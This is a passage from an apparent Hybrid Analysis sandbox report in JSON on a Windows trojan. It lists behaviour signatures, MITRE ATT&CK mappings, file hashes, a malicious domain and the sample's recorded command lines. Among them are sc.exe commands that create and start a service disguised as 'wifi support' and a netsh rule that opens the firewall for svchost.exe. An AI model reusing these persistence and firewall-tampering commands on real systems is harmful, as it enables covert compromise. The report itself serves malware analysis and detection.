attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:443", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"dqczsfku.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00005212)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start vrzjqkmq\" (UID: 00000000-00005144)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00005184)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08
https://hybrid-analysis.com/sample/1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08
Hybrid Analysis - Um_unhooking
{"size": 13028864, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08", "sha256": "1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08", "av_detect": 85, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 3, "total_processes": 9, "total_signatures": 222, "extracted_files": [{"name": "evryposw.exe", "file_path": "%TEMP%\\evryposw.exe", "file_size": 5242368, "sha256": "30126cf67408caedf978c586247887873a79678b39c173264c9dd220674fb75c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cmd.exe (PID: 3340)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "evryposw.exe.67EE49C3.bin", "file_size": 14732800, "sha256": "9995b6c4b07aefe3ca66405e45cbdfa29d95878cd7243c8dc51d22770030aaba", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00004600", "name": "1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe", "normalized_path": "C:\\1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe", "sha256": "1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08"}, {"uid": "00000000-00002140", "parentuid": "00000000-00004600", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\fbjtauwa\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00003340", "parentuid": "00000000-00004600", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\evryposw.exe\" %WINDIR%\\system32\\fbjtauwa\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00002920", "parentuid": "00000000-00004600", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create fbjtauwa binPath= \"%WINDIR%\\system32\\fbjtauwa\\evryposw.exe /d\\\"C:\\1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00002876", "parentuid": "00000000-00004600", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description fbjtauwa \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004864", "parentuid": "00000000-00004600", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start fbjtauwa", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004612", "parentuid": "00000000-00004600", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00004152", "name": "evryposw.exe", "normalized_path": "%WINDIR%\\system32\\fbjtauwa\\evryposw.exe", "command_line": "/d\"C:\\1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\"", "sha256": "9995b6c4b07aefe3ca66405e45cbdfa29d95878cd7243c8dc51d22770030aaba"}, {"uid": "00000000-00004740", "parentuid": "00000000-00004152", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 4, "informative_identifiers_count": 14}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 3}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 3, "informative_identifiers_count": 20}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric 